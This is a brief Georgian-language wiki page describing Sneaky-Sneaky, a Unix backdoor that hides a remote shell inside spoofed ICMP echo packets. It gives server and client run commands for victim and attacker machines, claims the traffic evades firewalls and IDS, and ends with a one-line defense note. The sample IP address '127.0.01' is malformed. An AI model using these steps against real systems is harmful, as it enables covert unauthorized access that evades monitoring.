შესავალი

Sneaky-Sneaky (იუნიქსი) ამყარებს კავშირს ICMP echo reply პაკეტების მეშვეობით, ასეთი პაკეტები იგნონირებულები არიან ბირთვის მიერ და მაშასადამე არ იბლოკებიან. კლიენტის და სერვერის გაგზავნილი პაკეტები გაყალბებულები არიან, და ნამდვილი IP არის შიფრული მარგი ტვირთში (payload). Sneaky-Sneaky ამ IP მისამართს იყენებს კავშირის დასამყარად, “შესამჩნევი” წყარო IP არასდროს არ არის გამოყენებული.

მსხვერპლის კომპიუტერში (სერვერი)

სინტაქსი:

ibd-server <ICMP კოდი>

ამ მაგალითში ICMP კოდისთვის ვიხმართ 0-ს, 0 სერვერს ანიშნებს რომ ICMP echo reply header-ებით გასცეს პასუხი.

მაგალითი:

ibd-server 0

თავდასხმელის კომპიუტერში

სინტაქსი:

ibd-client <მსხვერპლის IP მისამართი> <ICMP კოდი>

ამ მაგალითში ICMP კოდისთვის ვიხმართ 8-ს, კოდი 8 ანიშნებს რომ ICMP Echo Requestებით გამოიყენოს.

მაგალითი:

ibd-client 127.0.01 8

კლიენტი დაუკავშირდება სერვერს და მოგცემს შელს, ისე რომ გინდა იმ კომპიუტერთან იჯდე ისე შეგიძლია იმოქმედო.

რახან სერვერი პასუხს გასცემს ICMP Echo Reply ტიპის პაკეტით და თავდამსხმელი ხმარობს ICMP Echo Request პაკეტებს, ქსელური მიძრაობა ნორმარულად მოეჩვენება firewall-საც და IDS-საც.

დაცვა

განახლებული antivirus, ძლიერი firewall-ის ACL-ები.

ტროას_ცხენი/sneaky_sneaky.txt · Last modified: 2011/09/22 17:47 (external edit)
Back to top
Public Domain
chimeric.de = chi`s home Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0